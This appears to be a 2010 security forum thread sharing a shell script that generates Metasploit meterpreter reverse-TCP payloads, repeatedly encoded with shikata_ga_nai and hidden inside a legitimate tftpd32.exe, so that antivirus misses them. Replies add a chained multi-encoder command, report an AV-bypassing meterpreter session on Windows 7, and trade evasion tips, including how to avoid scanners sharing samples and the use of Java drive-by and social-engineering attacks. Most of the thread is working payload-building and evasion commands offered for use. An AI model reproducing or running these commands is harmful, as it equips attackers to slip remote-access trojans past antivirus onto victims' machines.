Script 4 AV bypass meterpreters
avbypass.sh creates a number of files to bypass a AV engine. The most AV engines find an trojan in the meterpreter file. avbypass.sh is a simple script that use another .exe to hide the trojan in the file an encode it x-times. It is interesting to see for example you encode it two times and VirusTotal - Free Online Virus and Malware Scan reported 5/41 scanners found a trojan, you encode it 3 times and virustotal.com reported 7/41 scanners found a trojan. So this script create an x-number of files that you can check on Jotti's malware scan (19 AV scanners) or VirusTotal - Free Online Virus and Malware Scan (41 AV scanners).
use the script like #sh avbypass.sh 10.0.0.1 2222 4 /root/testfile
I hope this script help you to check and create your files faster.Code:#!/bin/sh # (C)opyright 2010 - pigtail23 # AVbypass Creator v. 1.0 (2010-06-06) #msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x -->>> /pentest/windows-binaries/tools/tftpd32.exe <<<-- -t exe > $4$c.exe #/pentest/windows-binaries/tools/tftpd32.exe <--- you can use a file of your choise echo "sh avbypass.sh <IP> <Port> <Number of times to encode> <Filename>" if [[ $1 ]]; then echo "IP:" $1 ; else echo "IP not set"; exit 0; fi if [[ $2 ]]; then echo "Port:" $2 ; else echo "Port not set"; exit 0; fi if [[ $3 ]]; then echo "Number:" $3 ; else echo "Set Number"; exit 0; fi if [[ $4 ]]; then echo "Filename:" $4 ; else echo "Set Filename"; exit 0; fi echo "File/-s creating. Pls Wait..." for (( c=1; c<=$3; c++ )) do msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x /pentest/windows-binaries/tools/tftpd32.exe -t exe > $4$c.exe echo "File" $4$c".exe was created." done
and sry for my bad english.
pigtail23
in the next time will come an update that automate the upload to virustotal. have fun ;D
Last edited by Archangel-Amael; 06-14-2010 at 06:00 PM.
Re: Script 4 AV bypass meterpreters
awesome script i like that.
i have playing aroung with av evasion on metasploit for some month.
but i dont get my file detected under 5 av products. i dont know why.
i have testes out many options, i encoded it in a chain but no effect.
i like that,so i will test out your script.
ähhm how to get my file encoded with more tan 2 encoders.
sometimes my new encoded executable is broken...
do you have any idea?
SilentShadow
Re: Script 4 AV bypass meterpreters
Thanks for sharing this nice script that speeds things up.
I have found however, some mixed results. In one case the resulting exe was indeed able to bypass most AVs and execute without a problem. However, after a few minutes the exe just cleanly exited. I tested it on an XP SP3 machine and noticed the original windows file runs normally and only exits if you forcefully kill it. The msfencoded binary however exits on its own.
Strange behavior that I can't logically figure out. Any thoughts?
I guess the double encoding somehow adds this annoying bug. Otherwise perfect.
Re: Script 4 AV bypass meterpreters
I think you can pipe it | through multiple times although it may break the final binary. Try it and let us know if it worked for you.Originally Posted by SilentShadow
Re: Script 4 AV bypass meterpreters
yes it work with | ...
Re: Script 4 AV bypass meterpreters
If you use either of those sites your files will be distributed to the AV companies and will become detected.
This site has an option not to distribute, whether they stick by it I don't know: scanner.novirusthanks.org
Re: Script 4 AV bypass meterpreters
Here is my example of a successful multi encode. Not so sure it accomplishes THAT much. Seems once you've got it encoded to a certain point it won't matter as most AV that is still detecting it is doing so by heuristics engine(behaviour?) Correct me if I'm wrong. Definitely still learning.Code:cd /pentest/exploits/framework3 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26 LPORT=1417 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe
This much encoding broke my exe when I tried on bt4-pre-final (metasploit up to date).
building payload using R1 and executing this payload on win7x64 got me meterpreter session.
I did first build the payload with NO encoding to test against my AV(avast free). Avast picks up the meterpreter payload unencoded. Attempt two using the above command successfully bypassed. Again not sure if that much encoding is really needed but just an example what you can do with the command.
Last edited by iproute; 09-18-2010 at 10:56 PM.
Re: Script 4 AV bypass meterpreters
i'm encoding ten times but still AVG can detect it. So encoding can't by pass AV fully any other way-out??
Re: Script 4 AV bypass meterpreters
Yeah AVG almost always picks up the payloads. I've had difficulty getting them past AVG, and a couple of others. Encoding doesn't seem to help.
I've really gotta say that I don't think exe payloads are really the best way to get into something anyway. Great tool, but you're much better off with some sort of exploit rather than relying on a client side attack IMHO. I suppose it depends on how practiced at social engineering you are.
A java drive-by is not detected by AV as I recall. The social engineering toolkit has this attack type scripted, very handy. It's also all there in metasploit for setting up manually.
As always "Pick the lowest hanging fruit first!" and "Try Harder!"
Re: Script 4 AV bypass meterpreters
Cann see that your using alot of diff encoder. i have been looking every where to find a command that will list these encoders (currently 27) du you know how?
Posting Permissions
